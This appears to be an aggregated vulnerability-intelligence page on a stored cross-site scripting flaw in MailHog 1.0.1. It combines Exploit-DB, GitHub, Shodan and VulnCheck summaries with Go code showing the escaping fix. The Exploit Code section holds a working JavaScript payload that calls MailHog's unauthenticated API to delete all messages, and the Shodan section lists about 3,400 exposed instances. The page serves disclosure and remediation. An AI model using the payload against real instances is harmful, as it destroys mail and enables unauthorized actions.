# Mailhog 1.0.1 Stored XSS Vulnerability
N/A
Web-type vulnerability: Unknown
Reasoning:
Title: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) - Multiple webapps Exploit -- 🔗Source link
Tags: exploit
Shenlong quick read:
The following key information about the vulnerability can be taken from this web page screenshot:
### Vulnerability information
- **EDB-ID**: 50971
- **CVE**: N/A
- **Author**: Vulnz
- **Type**: WEBAPPS
- **Platform**: MULTIPLE
- **Date**: 2022-06-27
- **Vulnerable App**: MailHog 1.0.1
### Exploit Details
- **Exploit Title**: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)
- **Google Dork**: https://www.shodan.io/search?query=mailhog (> 3500)
- **Date**: 06.18.2022
- **Exploit Author**: Vulnz
- **Vendor Homepage**: https://github.com/mailhog/MailHog
- **Software Link**: https://github.com/mailhog/MailHog
- **Version**: 1.0.1
- **Tested on**: Windows, Linux, Docker
- **CVE**: N/A
### Explanation
Malicious users can send API requests to localhost, and these requests are executed without any additional checks. As long as the CSRF weakness and the unrestricted API calls both exist, the XSS can trigger any API call, including deleting, sending, or reading email, or any other call.
### Exploit Code
```javascript
// Build an XHR object, falling back to legacy ActiveX constructors on old IE.
var XMLHttpFactories = [
    function () {
        return new XMLHttpRequest();
    },
    function () {
        return new ActiveXObject("Msxml2.XMLHTTP");
    },
    function () {
        return new ActiveXObject("Msxml3.XMLHTTP");
    },
    function () {
        return new ActiveXObject("Microsoft.XMLHTTP");
    }
];

function createXMLHTTPObject() {
    var xmlhttp = false;
    for (var i = 0; i < XMLHttpFactories.length; i++) {
        try {
            xmlhttp = XMLHttpFactories[i]();
        } catch (e) {
            continue;
        }
        break;
    }
    return xmlhttp;
}

// Once the stored script runs inside the MailHog web UI, it calls the
// unauthenticated API on the same origin; here it deletes all messages.
var xhr = createXMLHTTPObject();
xhr.open("DELETE", "http://localhost:8025/api/v1/messages", true);
xhr.onreadystatechange = function () {
    if (xhr.readyState == 4) {
        alert("Request completed, with the following status code: " + xhr.status);
    }
};
xhr.send("");
```
### Additional Notes
- The exploit has not been verified by the EDB (Exploit Database).
- The vulnerability is related to a Stored Cross-Site Scripting (XSS) attack in MailHog 1.0.1.
- The exploit can potentially lead to unauthorized API calls, including email deletion, sending, reading, or any other call.
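The root cause the advisory names (CWE-79: attacker-controlled mail fields rendered unescaped in the web UI, so the injected script runs in the UI's own origin and can reach its API) and the fix, side by side, as an added example. This is illustrative code written for this page, not MailHog's source; `Message`, `renderUnsafe`, `renderSafe` and `messageList` are hypothetical names and the sample message is constructed.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"net/http"
)

// Message is a constructed stand-in for a mail received over SMTP. Every
// field is attacker-controlled: anyone who can reach the SMTP port sets it.
type Message struct {
	From, Subject, AttachmentName string
}

// renderUnsafe shows the bug class behind the advisory (CWE-79): mail fields
// are concatenated straight into the page, so a <script> in a subject or an
// attachment name runs in the web UI's origin and can reach its API.
func renderUnsafe(m Message) string {
	return "<li>" + m.From + ": " + m.Subject + " [" + m.AttachmentName + "]</li>\n"
}

// safeTmpl is parsed by html/template, which escapes each field for the HTML
// context it lands in, so the same data is shown as plain text.
var safeTmpl = template.Must(template.New("msg").Parse(
	"<li>{{.From}}: {{.Subject}} [{{.AttachmentName}}]</li>\n"))

func renderSafe(m Message) string {
	var buf bytes.Buffer
	if err := safeTmpl.Execute(&buf, m); err != nil {
		return "<li>(unrenderable message)</li>\n"
	}
	return buf.String()
}

// messageList is a hypothetical mailbox handler (not MailHog's) that always
// goes through the escaping renderer.
func messageList(msgs []Message) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "text/html; charset=utf-8")
		fmt.Fprint(w, "<ul>\n")
		for _, m := range msgs {
			fmt.Fprint(w, renderSafe(m))
		}
		fmt.Fprint(w, "</ul>\n")
	})
}
```

Escaping at render time is the fix that holds even when the API is reachable without authentication, because the injected markup never becomes executable script in the first place.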
Title: GitHub - mailhog/MailHog: Web and API based SMTP testing -- 🔗Source link
Tags: product
Shenlong quick read:
### Key vulnerability information
This screenshot does not directly indicate any specific vulnerabilities. However, some key security considerations based on the information provided:
- **SMTP Server Configuration**: The application acts as an SMTP server. Misconfiguration could lead to unauthorized access or relaying.
- **HTTP Server**: The HTTP server runs on port 8025. Ensure it is not exposed to the public internet without proper authentication.
- **In-Memory Storage**: Messages are stored in memory by default. This could lead to data loss in case of crashes. Consider using persistent storage options.
- **API Access**: The application has an HTTP API. Ensure proper authentication and authorization are in place.
- **Chaos Monkey**: Includes a feature for failure testing. Use with caution in production environments.
Title: mailhog - Shodan Search -- 🔗Source link
Tags: product
Shenlong quick read:
### Key vulnerability information
#### Total results
- **Total**: 3,408
#### Vulnerability summary
- **Main product**: MailHog
- **Vulnerability information**:
  - **Sample vulnerability information**: `522 mailhog.example ESMTPL MailHog\r\n`
#### Geographic distribution
- **Top countries**
  - Germany (947)
  - United States (515)
  - France (364)
  - Russian Federation (229)
  - Netherlands (194)
#### Port distribution
- **Top ports**
  - 1025 (2,995)
  - 25 (87)
  - 1026 (76)
  - 443 (30)
  - 1027 (27)
#### Organization distribution
- **Top organizations**
  - Hetzner Online GmbH (635)
  - DigitalOcean, LLC (486)
  - OVH SAS (228)
  - Google LLC (160)
  - Contabo GmbH (142)
#### Technology stack
- **Top products**
  - nginx (24)
  - Docker Registry HTTP API (21)
  - Apache httpd (9)
  - Prometheus Node Exporter (1)
- **Operating systems**
  - Ubuntu (10)
  - Ubuntu 22.04.4 LTS (Jammy Jellyfish) (Linux 5.15.0-112-generic) (1)
This information outlines the distribution of systems running MailHog, which ports are exposed, and the associated technology stack and operating systems; it can help security researchers or system administrators understand the scope of impact and the technical context of the vulnerability.
Title: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) | Advisories | VulnCheck -- 🔗Source link
Tags: third-party-advisory
Shenlong quick read:
## Key information
- **Vulnerability name:** Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)
- **Severity:** MEDIUM
- **Date:** January 13, 2026
- **Affected version:** Mailhog 1.0.1
- **CVE ID:** CVE-2022-50908
- **CWE:** CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- **CVSS score:** 5.4 (CVSSv3 Score: 5.4/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)
- **References:**
  - [NVD](https://nvd.nist.gov/vuln/detail/CVE-2022-50908)
  - [ExploitDB](https://www.exploit-db.com/exploits/50971)
  - [MailHog GitHub Repository](https://github.com/mailhog/MailHog)
  - [Shodan Search Results for MailHog](https://www.shodan.io/search?query=MailHog)
- **Discoverer:** Vulnz
- **Description:** Mailhog 1.0.1 contains a stored cross-site scripting vulnerability that lets an attacker inject malicious script through email attachments. An attacker can send a crafted email carrying an XSS payload to execute arbitrary API calls, including message deletion and browser actions.